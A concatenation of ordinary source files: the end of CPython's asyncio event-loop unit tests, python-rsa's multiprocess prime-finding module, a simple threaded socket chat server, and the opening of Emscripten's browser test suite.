sock.connect.assert_called_with(('1.2.3.4', 80))
_, kwargs = m_socket.socket.call_args
self.assertEqual(kwargs['family'], m_socket.AF_INET)
self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
sock.family = socket.AF_INET6
coro = self.loop.create_connection(asyncio.Protocol, '::1', 80)
t, p = self.loop.run_until_complete(coro)
try:
# Without inet_pton we use getaddrinfo, which transforms ('::1', 80)
# to ('::1', 80, 0, 0). The last 0s are flow info, scope id.
[address] = sock.connect.call_args[0]
host, port = address[:2]
self.assertRegex(host, r'::(0\.)*1')
self.assertEqual(port, 80)
_, kwargs = m_socket.socket.call_args
self.assertEqual(kwargs['family'], m_socket.AF_INET6)
self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
@patch_socket
def test_create_connection_ip_addr(self, m_socket):
self._test_create_connection_ip_addr(m_socket, True)
@patch_socket
def test_create_connection_no_inet_pton(self, m_socket):
self._test_create_connection_ip_addr(m_socket, False)
@patch_socket
def test_create_connection_service_name(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
sock = m_socket.socket.return_value
self.loop._add_reader = mock.Mock()
self.loop._add_reader._is_coroutine = False
self.loop._add_writer = mock.Mock()
self.loop._add_writer._is_coroutine = False
for service, port in ('http', 80), (b'http', 80):
coro = self.loop.create_connection(asyncio.Protocol,
'127.0.0.1', service)
t, p = self.loop.run_until_complete(coro)
try:
sock.connect.assert_called_with(('127.0.0.1', port))
_, kwargs = m_socket.socket.call_args
self.assertEqual(kwargs['family'], m_socket.AF_INET)
self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
for service in 'nonsense', b'nonsense':
coro = self.loop.create_connection(asyncio.Protocol,
'127.0.0.1', service)
with self.assertRaises(OSError):
self.loop.run_until_complete(coro)
def test_create_connection_no_local_addr(self):
@asyncio.coroutine
def getaddrinfo(host, *args, **kw):
if host == 'example.com':
return [(2, 1, 6, '', ('107.6.106.82', 80)),
(2, 1, 6, '', ('107.6.106.82', 80))]
else:
return []
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
self.loop.getaddrinfo = getaddrinfo_task
coro = self.loop.create_connection(
MyProto, 'example.com', 80, family=socket.AF_INET,
local_addr=(None, 8080))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_connection_bluetooth(self, m_socket):
# See http://bugs.python.org/issue27136, fallback to getaddrinfo when
# we can't recognize an address is resolved, e.g. a Bluetooth address.
addr = ('00:01:02:03:04:05', 1)
def getaddrinfo(host, port, *args, **kw):
assert (host, port) == addr
return [(999, 1, 999, '', (addr, 1))]
m_socket.getaddrinfo = getaddrinfo
sock = m_socket.socket()
coro = self.loop.sock_connect(sock, addr)
self.loop.run_until_complete(coro)
def test_create_connection_ssl_server_hostname_default(self):
self.loop.getaddrinfo = mock.Mock()
def mock_getaddrinfo(*args, **kwds):
f = asyncio.Future(loop=self.loop)
f.set_result([(socket.AF_INET, socket.SOCK_STREAM,
socket.SOL_TCP, '', ('1.2.3.4', 80))])
return f
self.loop.getaddrinfo.side_effect = mock_getaddrinfo
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.return_value = self.loop.create_future()
self.loop.sock_connect.return_value.set_result(None)
self.loop._make_ssl_transport = mock.Mock()
class _SelectorTransportMock:
_sock = None
def get_extra_info(self, key):
return mock.Mock()
def close(self):
self._sock.close()
def mock_make_ssl_transport(sock, protocol, sslcontext, waiter,
**kwds):
waiter.set_result(None)
transport = _SelectorTransportMock()
transport._sock = sock
return transport
self.loop._make_ssl_transport.side_effect = mock_make_ssl_transport
ANY = mock.ANY
handshake_timeout = object()
# First try the default server_hostname.
self.loop._make_ssl_transport.reset_mock()
coro = self.loop.create_connection(
MyProto, 'python.org', 80, ssl=True,
ssl_handshake_timeout=handshake_timeout)
transport, _ = self.loop.run_until_complete(coro)
transport.close()
self.loop._make_ssl_transport.assert_called_with(
ANY, ANY, ANY, ANY,
server_side=False,
server_hostname='python.org',
ssl_handshake_timeout=handshake_timeout)
# Next try an explicit server_hostname.
self.loop._make_ssl_transport.reset_mock()
coro = self.loop.create_connection(
MyProto, 'python.org', 80, ssl=True,
server_hostname='perl.com',
ssl_handshake_timeout=handshake_timeout)
transport, _ = self.loop.run_until_complete(coro)
transport.close()
self.loop._make_ssl_transport.assert_called_with(
ANY, ANY, ANY, ANY,
server_side=False,
server_hostname='perl.com',
ssl_handshake_timeout=handshake_timeout)
# Finally try an explicit empty server_hostname.
self.loop._make_ssl_transport.reset_mock()
coro = self.loop.create_connection(
MyProto, 'python.org', 80, ssl=True,
server_hostname='',
ssl_handshake_timeout=handshake_timeout)
transport, _ = self.loop.run_until_complete(coro)
transport.close()
self.loop._make_ssl_transport.assert_called_with(
ANY, ANY, ANY, ANY,
server_side=False,
server_hostname='',
ssl_handshake_timeout=handshake_timeout)
def test_create_connection_no_ssl_server_hostname_errors(self):
# When not using ssl, server_hostname must be None.
coro = self.loop.create_connection(MyProto, 'python.org', 80,
server_hostname='')
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
coro = self.loop.create_connection(MyProto, 'python.org', 80,
server_hostname='python.org')
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_ssl_server_hostname_errors(self):
# When using ssl, server_hostname may be None if host is non-empty.
coro = self.loop.create_connection(MyProto, '', 80, ssl=True)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
coro = self.loop.create_connection(MyProto, None, 80, ssl=True)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
sock = socket.socket()
coro = self.loop.create_connection(MyProto, None, None,
ssl=True, sock=sock)
self.addCleanup(sock.close)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_ssl_timeout_for_plain_socket(self):
coro = self.loop.create_connection(
MyProto, 'example.com', 80, ssl_handshake_timeout=1)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
def test_create_server_empty_host(self):
# if host is empty string use None instead
host = object()
@asyncio.coroutine
def getaddrinfo(*args, **kw):
nonlocal host
host = args[0]
yield from []
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
self.loop.getaddrinfo = getaddrinfo_task
fut = self.loop.create_server(MyProto, '', 0)
self.assertRaises(OSError, self.loop.run_until_complete, fut)
self.assertIsNone(host)
def test_create_server_host_port_sock(self):
fut = self.loop.create_server(
MyProto, '0.0.0.0', 0, sock=object())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
def test_create_server_no_host_port_sock(self):
fut = self.loop.create_server(MyProto)
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
def test_create_server_no_getaddrinfo(self):
getaddrinfo = self.loop.getaddrinfo = mock.Mock()
getaddrinfo.return_value = self.loop.create_future()
getaddrinfo.return_value.set_result(None)
f = self.loop.create_server(MyProto, 'python.org', 0)
self.assertRaises(OSError, self.loop.run_until_complete, f)
@patch_socket
def test_create_server_nosoreuseport(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
del m_socket.SO_REUSEPORT
m_socket.socket.return_value = mock.Mock()
f = self.loop.create_server(
MyProto, '0.0.0.0', 0, reuse_port=True)
self.assertRaises(ValueError, self.loop.run_until_complete, f)
@patch_socket
def test_create_server_soreuseport_only_defined(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
m_socket.socket.return_value = mock.Mock()
m_socket.SO_REUSEPORT = -1
f = self.loop.create_server(
MyProto, '0.0.0.0', 0, reuse_port=True)
self.assertRaises(ValueError, self.loop.run_until_complete, f)
@patch_socket
def test_create_server_cant_bind(self, m_socket):
class Err(OSError):
strerror = 'error'
m_socket.getaddrinfo.return_value = [
(2, 1, 6, '', ('127.0.0.1', 10100))]
m_socket.getaddrinfo._is_coroutine = False
m_sock = m_socket.socket.return_value = mock.Mock()
m_sock.bind.side_effect = Err
fut = self.loop.create_server(MyProto, '0.0.0.0', 0)
self.assertRaises(OSError, self.loop.run_until_complete, fut)
self.assertTrue(m_sock.close.called)
@patch_socket
def test_create_datagram_endpoint_no_addrinfo(self, m_socket):
m_socket.getaddrinfo.return_value = []
m_socket.getaddrinfo._is_coroutine = False
coro = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr=('localhost', 0))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_datagram_endpoint_addr_error(self):
coro = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr='localhost')
self.assertRaises(
AssertionError, self.loop.run_until_complete, coro)
coro = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr=('localhost', 1, 2, 3))
self.assertRaises(
AssertionError, self.loop.run_until_complete, coro)
def test_create_datagram_endpoint_connect_err(self):
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, remote_addr=('127.0.0.1', 0))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_datagram_endpoint_socket_err(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
m_socket.socket.side_effect = OSError
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, family=socket.AF_INET)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, local_addr=('127.0.0.1', 0))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_datagram_endpoint_no_matching_family(self):
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol,
remote_addr=('127.0.0.1', 0), local_addr=('::1', 0))
self.assertRaises(
ValueError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_datagram_endpoint_setblk_err(self, m_socket):
m_socket.socket.return_value.setblocking.side_effect = OSError
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, family=socket.AF_INET)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
self.assertTrue(
m_socket.socket.return_value.close.called)
def test_create_datagram_endpoint_noaddr_nofamily(self):
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_datagram_endpoint_cant_bind(self, m_socket):
class Err(OSError):
pass
m_socket.getaddrinfo = socket.getaddrinfo
m_sock = m_socket.socket.return_value = mock.Mock()
m_sock.bind.side_effect = Err
fut = self.loop.create_datagram_endpoint(
MyDatagramProto,
local_addr=('127.0.0.1', 0), family=socket.AF_INET)
self.assertRaises(Err, self.loop.run_until_complete, fut)
self.assertTrue(m_sock.close.called)
def test_create_datagram_endpoint_sock(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('127.0.0.1', 0))
fut = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
sock=sock)
transport, protocol = self.loop.run_until_complete(fut)
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_datagram_endpoint_sock_unix(self):
fut = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
family=socket.AF_UNIX)
transport, protocol = self.loop.run_until_complete(fut)
assert transport._sock.family == socket.AF_UNIX
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
def test_create_datagram_endpoint_sock_sockopts(self):
class FakeSock:
type = socket.SOCK_DGRAM
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr=('127.0.0.1', 0), sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, remote_addr=('127.0.0.1', 0), sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, family=1, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, proto=1, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, flags=1, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, reuse_address=True, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, reuse_port=True, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, allow_broadcast=True, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
def test_create_datagram_endpoint_sockopts(self):
# Socket options should not be applied unless asked for.
# SO_REUSEADDR defaults to on for UNIX.
# SO_REUSEPORT is not available on all platforms.
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
local_addr=('127.0.0.1', 0))
transport, protocol = self.loop.run_until_complete(coro)
sock = transport.get_extra_info('socket')
reuse_address_default_on = (
os.name == 'posix' and sys.platform != 'cygwin')
reuseport_supported = hasattr(socket, 'SO_REUSEPORT')
if reuse_address_default_on:
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR))
else:
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR))
if reuseport_supported:
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_BROADCAST))
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
local_addr=('127.0.0.1', 0),
reuse_address=True,
reuse_port=reuseport_supported,
allow_broadcast=True)
transport, protocol = self.loop.run_until_complete(coro)
sock = transport.get_extra_info('socket')
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR))
if reuseport_supported:
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_BROADCAST))
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
@patch_socket
def test_create_datagram_endpoint_nosoreuseport(self, m_socket):
del m_socket.SO_REUSEPORT
m_socket.socket.return_value = mock.Mock()
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
local_addr=('127.0.0.1', 0),
reuse_address=False,
reuse_port=True)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_datagram_endpoint_ip_addr(self, m_socket):
def getaddrinfo(*args, **kw):
self.fail('should not have called getaddrinfo')
m_socket.getaddrinfo = getaddrinfo
m_socket.socket.return_value.bind = bind = mock.Mock()
self.loop._add_reader = mock.Mock()
self.loop._add_reader._is_coroutine = False
reuseport_supported = hasattr(socket, 'SO_REUSEPORT')
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
local_addr=('1.2.3.4', 0),
reuse_address=False,
reuse_port=reuseport_supported)
t, p = self.loop.run_until_complete(coro)
try:
bind.assert_called_with(('1.2.3.4', 0))
m_socket.socket.assert_called_with(family=m_socket.AF_INET,
proto=m_socket.IPPROTO_UDP,
type=m_socket.SOCK_DGRAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
def test_accept_connection_retry(self):
sock = mock.Mock()
sock.accept.side_effect = BlockingIOError()
self.loop._accept_connection(MyProto, sock)
self.assertFalse(sock.close.called)
@mock.patch('asyncio.base_events.logger')
def test_accept_connection_exception(self, m_log):
sock = mock.Mock()
sock.fileno.return_value = 10
sock.accept.side_effect = OSError(errno.EMFILE, 'Too many open files')
self.loop._remove_reader = mock.Mock()
self.loop.call_later = mock.Mock()
self.loop._accept_connection(MyProto, sock)
self.assertTrue(m_log.error.called)
self.assertFalse(sock.close.called)
self.loop._remove_reader.assert_called_with(10)
self.loop.call_later.assert_called_with(
constants.ACCEPT_RETRY_DELAY,
# self.loop._start_serving
mock.ANY,
MyProto, sock, None, None, mock.ANY, mock.ANY)
def test_call_coroutine(self):
@asyncio.coroutine
def simple_coroutine():
pass
self.loop.set_debug(True)
coro_func = simple_coroutine
coro_obj = coro_func()
self.addCleanup(coro_obj.close)
for func in (coro_func, coro_obj):
with self.assertRaises(TypeError):
self.loop.call_soon(func)
with self.assertRaises(TypeError):
self.loop.call_soon_threadsafe(func)
with self.assertRaises(TypeError):
self.loop.call_later(60, func)
with self.assertRaises(TypeError):
self.loop.call_at(self.loop.time() + 60, func)
with self.assertRaises(TypeError):
self.loop.run_until_complete(
self.loop.run_in_executor(None, func))
@mock.patch('asyncio.base_events.logger')
def test_log_slow_callbacks(self, m_logger):
def stop_loop_cb(loop):
loop.stop()
@asyncio.coroutine
def stop_loop_coro(loop):
yield from ()
loop.stop()
asyncio.set_event_loop(self.loop)
self.loop.set_debug(True)
self.loop.slow_callback_duration = 0.0
# slow callback
self.loop.call_soon(stop_loop_cb, self.loop)
self.loop.run_forever()
fmt, *args = m_logger.warning.call_args[0]
self.assertRegex(fmt % tuple(args),
"^Executing <Handle.*stop_loop_cb.*> "
"took .* seconds$")
# slow task
asyncio.ensure_future(stop_loop_coro(self.loop), loop=self.loop)
self.loop.run_forever()
fmt, *args = m_logger.warning.call_args[0]
self.assertRegex(fmt % tuple(args),
"^Executing <Task.*stop_loop_coro.*> "
"took .* seconds$")
class RunningLoopTests(unittest.TestCase):
def test_running_loop_within_a_loop(self):
@asyncio.coroutine
def runner(loop):
loop.run_forever()
loop = asyncio.new_event_loop()
outer_loop = asyncio.new_event_loop()
try:
with self.assertRaisesRegex(RuntimeError,
'while another loop is running'):
outer_loop.run_until_complete(runner(loop))
finally:
loop.close()
outer_loop.close()
class BaseLoopSockSendfileTests(test_utils.TestCase):
DATA = b"12345abcde" * 16 * 1024 # 160 KiB
class MyProto(asyncio.Protocol):
def __init__(self, loop):
self.started = False
self.closed = False
self.data = bytearray()
self.fut = loop.create_future()
self.transport = None
def connection_made(self, transport):
self.started = True
self.transport = transport
def data_received(self, data):
self.data.extend(data)
def connection_lost(self, exc):
self.closed = True
self.fut.set_result(None)
self.transport = None
async def wait_closed(self):
await self.fut
@classmethod
def setUpClass(cls):
cls.__old_bufsize = constants.SENDFILE_FALLBACK_READBUFFER_SIZE
constants.SENDFILE_FALLBACK_READBUFFER_SIZE = 1024 * 16
with open(support.TESTFN, 'wb') as fp:
fp.write(cls.DATA)
super().setUpClass()
@classmethod
def tearDownClass(cls):
constants.SENDFILE_FALLBACK_READBUFFER_SIZE = cls.__old_bufsize
support.unlink(support.TESTFN)
super().tearDownClass()
def setUp(self):
from asyncio.selector_events import BaseSelectorEventLoop
# BaseSelectorEventLoop() has no native implementation
self.loop = BaseSelectorEventLoop()
self.set_event_loop(self.loop)
self.file = open(support.TESTFN, 'rb')
self.addCleanup(self.file.close)
super().setUp()
def make_socket(self, blocking=False):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setblocking(blocking)
self.addCleanup(sock.close)
return sock
def run_loop(self, coro):
return self.loop.run_until_complete(coro)
def prepare(self):
sock = self.make_socket()
proto = self.MyProto(self.loop)
server = self.run_loop(self.loop.create_server(
lambda: proto, support.HOST, 0, family=socket.AF_INET))
addr = server.sockets[0].getsockname()
for _ in range(10):
try:
self.run_loop(self.loop.sock_connect(sock, addr))
except OSError:
self.run_loop(asyncio.sleep(0.5))
continue
else:
break
else:
# One last try, so we get the exception
self.run_loop(self.loop.sock_connect(sock, addr))
def cleanup():
server.close()
self.run_loop(server.wait_closed())
sock.close()
if proto.transport is not None:
proto.transport.close()
self.run_loop(proto.wait_closed())
self.addCleanup(cleanup)
return sock, proto
def test__sock_sendfile_native_failure(self):
sock, proto = self.prepare()
with self.assertRaisesRegex(events.SendfileNotAvailableError,
"sendfile is not available"):
self.run_loop(self.loop._sock_sendfile_native(sock, self.file,
0, None))
self.assertEqual(proto.data, b'')
self.assertEqual(self.file.tell(), 0)
def test_sock_sendfile_no_fallback(self):
sock, proto = self.prepare()
with self.assertRaisesRegex(events.SendfileNotAvailableError,
"sendfile is not available"):
self.run_loop(self.loop.sock_sendfile(sock, self.file,
fallback=False))
self.assertEqual(self.file.tell(), 0)
self.assertEqual(proto.data, b'')
def test_sock_sendfile_fallback(self):
sock, proto = self.prepare()
ret = self.run_loop(self.loop.sock_sendfile(sock, self.file))
sock.close()
self.run_loop(proto.wait_closed())
self.assertEqual(ret, len(self.DATA))
self.assertEqual(self.file.tell(), len(self.DATA))
self.assertEqual(proto.data, self.DATA)
def test_sock_sendfile_fallback_offset_and_count(self):
sock, proto = self.prepare()
ret = self.run_loop(self.loop.sock_sendfile(sock, self.file,
1000, 2000))
sock.close()
self.run_loop(proto.wait_closed())
self.assertEqual(ret, 2000)
self.assertEqual(self.file.tell(), 3000)
self.assertEqual(proto.data, self.DATA[1000:3000])
def test_blocking_socket(self):
self.loop.set_debug(True)
sock = self.make_socket(blocking=True)
with self.assertRaisesRegex(ValueError, "must be non-blocking"):
self.run_loop(self.loop.sock_sendfile(sock, self.file))
def test_nonbinary_file(self):
sock = self.make_socket()
with open(support.TESTFN, 'r') as f:
with self.assertRaisesRegex(ValueError, "binary mode"):
self.run_loop(self.loop.sock_sendfile(sock, f))
def test_nonstream_socket(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setblocking(False)
self.addCleanup(sock.close)
with self.assertRaisesRegex(ValueError, "only SOCK_STREAM type"):
self.run_loop(self.loop.sock_sendfile(sock, self.file))
def test_notint_count(self):
sock = self.make_socket()
with self.assertRaisesRegex(TypeError,
"count must be a positive integer"):
self.run_loop(self.loop.sock_sendfile(sock, self.file, 0, 'count'))
def test_negative_count(self):
sock = self.make_socket()
with self.assertRaisesRegex(ValueError,
"count must be a positive integer"):
self.run_loop(self.loop.sock_sendfile(sock, self.file, 0, -1))
def test_notint_offset(self):
sock = self.make_socket()
with self.assertRaisesRegex(TypeError,
"offset must be a non-negative integer"):
self.run_loop(self.loop.sock_sendfile(sock, self.file, 'offset'))
def test_negative_offset(self):
sock = self.make_socket()
with self.assertRaisesRegex(ValueError,
"offset must be a non-negative integer"):
self.run_loop(self.loop.sock_sendfile(sock, self.file, -1))
if __name__ == '__main__':
unittest.main()
|
parallel.py
|
# -*- coding: utf-8 -*-
#
# Copyright 2011 Sybren A. Stüvel <sybren@stuvel.eu>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Functions for parallel computation on multiple cores.
Introduced in Python-RSA 3.1.
.. note::
Requires Python 2.6 or newer.
"""
from __future__ import print_function
import multiprocessing as mp
from rsa._compat import range
import rsa.prime
import rsa.randnum
def _find_prime(nbits, pipe):
while True:
integer = rsa.randnum.read_random_odd_int(nbits)
# Test for primeness
if rsa.prime.is_prime(integer):
pipe.send(integer)
return
def getprime(nbits, poolsize):
"""Returns a prime number that can be stored in 'nbits' bits.
Works in multiple threads at the same time.
>>> p = getprime(128, 3)
>>> rsa.prime.is_prime(p-1)
False
>>> rsa.prime.is_prime(p)
True
>>> rsa.prime.is_prime(p+1)
False
>>> from rsa import common
>>> common.bit_size(p) == 128
True
"""
(pipe_recv, pipe_send) = mp.Pipe(duplex=False)
# Create processes
try:
procs = [mp.Process(target=_find_prime, args=(nbits, pipe_send))
for _ in range(poolsize)]
# Start processes
for p in procs:
p.start()
result = pipe_recv.recv()
finally:
pipe_recv.close()
pipe_send.close()
# Terminate processes
for p in procs:
p.terminate()
return result
__all__ = ['getprime']
if __name__ == '__main__':
print('Running doctests 1000x or until failure')
import doctest
for count in range(100):
(failures, tests) = doctest.testmod()
if failures:
break
if count and count % 10 == 0:
print('%i times' % count)
print('Doctests done')
|
server.py
|
import threading
import socket
host = '192.168.1.64'
port = 55555
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((host, port))
server.listen()
clients = []
nicknames = []
def broadcast(message):
for client in clients:
client.send(message)
def handle(client):
while True:
try:
message = client.recv(1024)
broadcast(message)
except:
index = clients.index(client)
clients.remove(client)
client.close()
nickname = nicknames[index]
broadcast(f'{nickname} left the chat!'.encode('utf-8'))
print(f'{nickname} left the chat!')
nicknames.remove(nickname)
break
def receive():
while True:
client, address = server.accept()
client.send('NICK'.encode('ascii'))
nickname = client.recv(1024).decode('utf-8')
nicknames.append(nickname)
clients.append(client)
print(f'{nickname} {str(address)}')
broadcast(f'{nickname} joined the chat!'.encode('utf-8'))
client.send('Connected to the server!'.encode('utf-8'))
thread = threading.Thread(target=handle, args=(client, ))
thread.start()
print("server has started")
receive()
|
test_browser.py
|
# coding=utf-8
from __future__ import print_function
import multiprocessing, os, shutil, subprocess, unittest, zlib, webbrowser, time, shlex
from runner import BrowserCore, path_from_root, has_browser, get_browser
from tools.shared import *
try:
from http.server import BaseHTTPRequestHandler, HTTPServer
except ImportError:
# Python 2 compatibility
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum, port):
class ChunkedServerHandler(BaseHTTPRequestHandler):
def sendheaders(s, extra=[], length=len(data)):
s.send_response(200)
s.send_header("Content-Length", str(length))
s.send_header("Access-Control-Allow-Origin", "http://localhost:%s" % port)
s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
s.send_header("Content-type", "application/octet-stream")
if support_byte_ranges:
s.send_header("Accept-Ranges", "bytes")
for i in extra:
s.send_header(i[0], i[1])
s.end_headers()
def do_HEAD(s):
s.sendheaders()
def do_OPTIONS(s):
s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)
def do_GET(s):
if not support_byte_ranges:
s.sendheaders()
s.wfile.write(data)
else:
(start, end) = s.headers.get("range").split("=")[1].split("-")
start = int(start)
end = int(end)
end = min(len(data)-1, end)
length = end-start+1
s.sendheaders([],length)
s.wfile.write(data[start:end+1])
s.wfile.close()
expectedConns = 11
httpd = HTTPServer(('localhost', 11111), ChunkedServerHandler)
for i in range(expectedConns+1):
httpd.handle_request()
def shell_with_script(shell_file, output_file, replacement):
with open(path_from_root('src', shell_file)) as input:
with open(output_file, 'w') as output:
output.write(input.read().replace('{{{ SCRIPT }}}', replacement))
class browser(BrowserCore):
@classmethod
def setUpClass(self):
super(browser, self).setUpClass()
self.browser_timeout = 20
self.test_wasm_pthreads = os.environ.get('TEST_WASM_PTHREADS', '0') == '1'
print()
print('Running the browser tests. Make sure the browser allows popups from localhost.')
print()
def test_sdl1_in_emscripten_nonstrict_mode(self):
if 'EMCC_STRICT' in os.environ and int(os.environ['EMCC_STRICT']): return self.skip('This test requires being run in non-strict mode (EMCC_STRICT env. variable unset)')
# TODO: This test is verifying behavior that will be deprecated at some point in the future, remove this test once
# system JS libraries are no longer automatically linked to anymore.
self.btest('hello_world_sdl.cpp', reference='htmltest.png')
def test_sdl1(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-lSDL', '-lGL'])
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-s', 'USE_SDL=1', '-lGL']) # is the default anyhow
# Deliberately named as test_zzz_* to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_html_source_map(self):
if not has_browser(): return self.skip('need a browser')
cpp_file = os.path.join(self.get_dir(), 'src.cpp')
html_file = os.path.join(self.get_dir(), 'src.html')
# browsers will try to 'guess' the corresponding original line if a
# generated line is unmapped, so if we want to make sure that our
# numbering is correct, we need to provide a couple of 'possible wrong
# answers'. thus, we add some printf calls so that the cpp file gets
# multiple mapped lines. in other words, if the program consists of a
# single 'throw' statement, browsers may just map any thrown exception to
# that line, because it will be the only mapped line.
with open(cpp_file, 'w') as f:
f.write(r'''
#include <cstdio>
int main() {
printf("Starting test\n");
try {
throw 42; // line 8
} catch (int e) { }
printf("done\n");
return 0;
}
''')
# use relative paths when calling emcc, because file:// URIs can only load
# sourceContent when the maps are relative paths
try_delete(html_file)
try_delete(html_file + '.map')
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'src.html', '-g4'],
cwd=self.get_dir()).communicate()
assert os.path.exists(html_file)
assert os.path.exists(html_file + '.map')
webbrowser.open_new('file://' + html_file)
time.sleep(1)
print('''
If manually bisecting:
Check that you see src.cpp among the page sources.
Even better, add a breakpoint, e.g. on the printf, then reload, then step through and see the print (best to run with EM_SAVE_DIR=1 for the reload).
''')
def test_emscripten_log(self):
src = os.path.join(self.get_dir(), 'src.cpp')
open(src, 'w').write(self.with_report_result(open(path_from_root('tests', 'emscripten_log', 'emscripten_log.cpp')).read()))
Popen([PYTHON, EMCC, src, '--pre-js', path_from_root('src', 'emscripten-source-map.min.js'), '-g', '-o', 'page.html', '-s', 'DEMANGLE_SUPPORT=1']).communicate()
self.run_browser('page.html', None, '/report_result?1')
